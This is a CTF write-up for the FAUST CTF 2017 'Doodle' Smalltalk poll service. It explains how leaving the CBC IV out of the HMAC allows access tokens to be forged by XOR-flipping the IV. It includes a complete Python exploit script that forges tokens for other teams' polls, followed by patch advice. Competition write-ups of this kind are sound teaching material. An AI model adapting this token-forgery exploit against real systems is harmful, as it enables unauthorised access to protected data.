FAUST CTF 2017 Doodle Writeup

02 June 2017 by Ben

FaustCTF’17: Doodle Writeup

Although we were a bit late to the party of exploitation, I nevertheless liked the idea behind doodle’s vulnerability, so I decided to do a write-up (even if there is not first-blood money coming…)

Introduction

In FAUSTCTF, there was a service dubbed Doodle, which provided the same basic features as its namesake. You could create a poll and have people vote for different options. To secure this, an access token was required for each poll. Whenever a poll was created or updated, you would be presented with a new token, but yet the old token still worked. All this could already be deduced without even looking at the source.

The Source Code

While many services in a CTF are written in “main-stream” languages such as Python, PHP, or C, this was a slightly different situation. FAUST took it on themselves to annoy the participants with Smalltalk ;-) Nevertheless, let’s try to understand what is happening here. First, we have a look at the interesting case from above, i.e., the fact that multiple access tokens work at the same time. The source for displaying a token (in poll.st) sheds some light on this:

html paragraph with: [
    html render: 'The access token is: '.
    token := Token new.
    token tokenvalue: (poll id).
    token cryptography.
    html span class: 'access-token';
    with: [ html render: (token serialize) ].
].

Here, we observe that a new Token is created, and the tokenvalue is set to carry the poll id (which basically is a UUID). Next, cryptography is called for the token, and finally it is serialized before being inserted into the HTML body. So, let’s try and understand what is happening in cryptography first. To that end, we open up token.st and find the following code:

cryptography [
	| ctx cbc mctx rnd enckey hmackey |

	<comment: 'Encrypt-Then-Mac, see http://cseweb.ucsd.edu/~mihir/papers/oem.html'>

	hmackey := FileStream open: 'hmac.key'.
	enckey := FileStream open: 'enc.key'.

	ctx := NettleTwofish new.
	ctx set_key: (enckey nextByteArray: 16).
	cbc := NettleTwofishCbc new.

	rnd := FileStream open: '/dev/urandom'.
	rnd next.
	iv := rnd nextByteArray: 16.
	cbc iv: iv.
	cbc context: ctx.
	ciphertext := cbc encrypt: tokenvalue.

	mctx := NettleHmacSha1 new.
	mctx set_key: (hmackey nextByteArray: 16).
	mctx update: ciphertext.
	mac := mctx digest.
	]

Here, we find a number of things. First, the algorithm used is TwoFish in CBC mode. The initialization vector (IV) is generated randomly each time. Once the encryption is done, a SHA1 HMAC is derived from the resulting ciphertext, but importantly does not include the IV. Let’s now look at the source for the serialize and deserialize functionality.

serialize [
	| b64 result |

	b64 :=NettleBase64Encode new.
	b64 init.
	result := b64 update: mac.
	result := result, (b64 update: iv).
	result := result, (b64 update: ciphertext).
	^(result, b64 finalize).
]

deserialize: data [
	| b64 buffer |

	b64 := NettleBase64Decode new.
	b64 init.

	buffer := b64 update: data.
	b64 finalize.

	mac := buffer copyFrom: 1 to: 20.
	iv := buffer copyFrom: 21 to: 36.

	ciphertext := buffer copyFrom: 37 to: ((buffer size)).
]

Even without an meaningful understanding of the language itself, we can see that when serializing the token, it merely is the base64 representation of the calculated HMAC, the IV, and the resulting ciphertext. Similarly, when deserializing, HMAC, IV, and ciphertext are “unpacked” accordingly.

Cipher Block Chaining

Cipher Block Chaining or CBC for short is a crypto mode which is meant to ensure that even if the same exact plain text is sent multiple times with the same key, the resulting crypt texts will look completely different. In a nutshell, CBC works as follows:

CIPHER_n = encrypt(PLAIN_n ^ CIPHER_n-1, key)

That is, we take the resulting ciphertext of the previous block and XOR it on the current plain text block. The result is then encrypted. Since naturally for the first cipher block, no previous encrypted block exists, an initilization vector is required. Hence, by changing the IV, the actual message being encrypted in the first step is changed. This changes the encrypted output, which subsequently changes all following blocks (since each block depends on the result of the previous cipher block). Decryption works in the same fashion:

PLAIN_n = decrypt(CIPHER_N, key) ^ CIPHER_n-1

For more information on CBC see the Wiki page.

The Vulnerability

Let’s sum up what we have learned so far:

Each poll has a poll id. More precisely it is a SandstoneDB identifier (e.g., 4E5B17E0-D631-11D2-84B3-FA1DE458B368)
The poll id is encrypted using TwoFish CBC, with a random IV.
The encrypted text is secured with an HMAC, but not the IV.
The token consists of the HMAC, the IV, and the ciphertext.

While I did not look deeper into how the poll ids were generated, an interesting fact is the following: the first entry in our database had the ID 4E5B17E0-D631-11D2-84B3-FA1DE458B368, the second one was 2E6F9860-D632-11D2-84B3-FA1DE458B368. One thing becomes quite clear here: only the first two “blocks” are changed. More important, the blocks are 8 and 4 bytes long, with an added dash in the middle. Hence, only the first 13 characters of the IDs are different, the rest is exactly the same (and based somehow on the current time).

Thinking back to how CBC works, we now see the vulnerability. While the encrypted text can not be mangled as it is secured by the HMAC, we are free to fiddle around with the IV. The IV is used to unXOR the first 16 byte block after the decryption step. Let’s assume that the gameserver created a poll with its ID starting with 4E5B..., and we created the second poll, getting the ID 2E6F.... We can learn the poll id for a given poll and we know our token, which encrypts our ID 2E6F....

For the sake of simplicity, let’s only focus on the first byte of our IV. We assume that is an “A” (0x41 in hex). Considering our token 2E6F..., the decryption looks something like this:

PLAIN_1 = decrypt(CIPHER_1, key) ^ 'A....'

PLAIN_1[0] = decrypt(CIPHER_1, key)[0] ^ 'A' = '2'

If we now want to change the ‘2’ into a ‘4’, we merely have to change the first byte of the IV, such that it is 'A' ^ '2' ^ '4' = 'G'. This allows us to produce a plaintext of our choosing after the XORing is done. This process can be applied in the same fashion to each of the first 16 bytes. Moreover, since we only modify the IV, the HMAC still works perfectly fine and no other plaintext block is changed. The horrible Python code exploiting this is shown below:

#!/usr/bin/python
import requests
import sys
from pwn import *
from bs4 import BeautifulSoup

def exploit(target):
  sess = requests.Session()

  # get session id and key first
  req = sess.get('http://' + target + ':80' + '/seaside/doodle', timeout=5)
  data_read = req.text
  sessid, key = re.findall("_s=(.*?)&amp;_k=(.*?)&", data_read)[0]

  # create new poll
  req = sess.get('http://' + target + ':80' + '/seaside/doodle?_s=%s&_k=%s&2' % (sessid, key), timeout=3)
  data_read = req.text
  sessid, key = re.findall("_s=(.*?)&amp;_k=(.*?)&", data_read)[0]
  postparams = {
    '6': '11',
    '_s': sessid,
    '19': '26',
    '22': '16',
    '23': '37',
    '25': 'Option 1',
    '20': '2017',
    '26': 'Option 2',
    '5': randoms(10),
    '28': 'Create',
    '_k': key }
  req = sess.post('http://' + target + ':80' + '/seaside/doodle', postparams, timeout=5)
  poll_id = re.findall("pollId=(.*)", req.url)[0]
  token = re.findall("[0-9a-zA-Z+/]{112}", req.text)[0]

  # at this point, we have the plaintext pollId and the encoded token

  decoded_token = b64d(token)
  hmac = decoded_token[:20]
  iv = decoded_token[20:36]
  rest = decoded_token[36:]

  # get the listing of current polls
  doodle_list = sess.get('http://' + target + ':80' + '/seaside/doodle', timeout=5).text
  doodles = re.findall("/seaside/doodle\?_s=.*?&amp;\d+", doodle_list)

  # parse the output, sort by expiry date so we only get the latest ones
  soup = BeautifulSoup(doodle_list)
  prio_list = collections.defaultdict(set)
  for tr in soup.find_all("tr")[1:]:
    link, date, experiy = tr.find_all("td")
    prio_list[date.text].add(re.findall("/seaside/doodle\?_s=.*?&amp;\d+", str(link))[0])
  urls = sorted(prio_list.items(), key=lambda x: x[0], reverse=True)

  for date, doodle_urls in urls[:5]:

    for doodle in list(doodle_urls):
      url = doodle.replace("&amp;", "&")
      poll = sess.get('http://' + target + ':80' + url)

      if "pollId" in poll.url:
        poll_id_new = re.findall("pollId=(.*)", poll.url)[0]
        key = re.findall("_k=(.*?)&amp;", poll.text)[0]
        sessid = re.findall("_s=(.*?)&amp;", poll.text)[0]

        # only first 16bytes differ from our pollId
        if poll_id_new[16:] == poll_id[16:]:
          print "URL", poll.url
          xor_key = xor(poll_id[:16], poll_id_new[:16])
          new_iv = xor(iv, xor_key[:16])
          new_token = b64e(hmac + new_iv + rest)
          postparams = {
            'pollId': poll_id_new,
            '_s': sessid,
            '5': new_token,
            '_k': key, }

          req = sess.post('http://' + target + ':80' + '/seaside/doodle', data=postparams, timeout=5)
          print req.text

if __name__ == '__main__':
  exploit(sys.argv[1])

Patching the flaw

While we did not actually manage to patch the issue in the CTF (simply because we did not compile the updated token.st file, since it was not in the Makefile and we did not notice..), there are several ways of addressing the issue. The dirty option we pursued, which merely would have held up exploits, was to change the order of the IV and HMAC in the serialized token. Assuming that nobody is specifically looking only at us, that would have sufficed. There are however three better ways of doing it.

Make the IV part of the HMAC calculation.
Make the IV static (similar to the TwoFish and HMAC keys).
Remove CBC altogether, since it really has no use here ;)

Wrapping up

I commend FAUST for taking the effort to program a service in Smalltalk which had this subtle bug in a lot of other code ;-) We were a little late to join the party of exploiting teams, also because I screwed up the exploit a bit in the first try. When trying to extract the token from the newly created poll, I calculated the required number of chars: 20 bytes HMAC, 16 bytes IV, and 48 bytes encrypted message (poll ids are only 36 bytes, but all messages must be padded to a multiple of 16 bytes). My snafu in that case was that I did not account for the base64 encoding: my regular expression was looking for 84 bytes rather than the required 112. It took me almost an hour to figure out my issue and I felt really stupid afterwards. Nevertheless, we managed to get 320 of the 367 successfully submitted Doodle flags with this exploit.

As my colleague Oliver already mentioned, the CTF ran quite nicely. They had a good mix of different services and I am happy we finished 3rd overall (see final scoreboard)

saarsec

Schwenk and pwn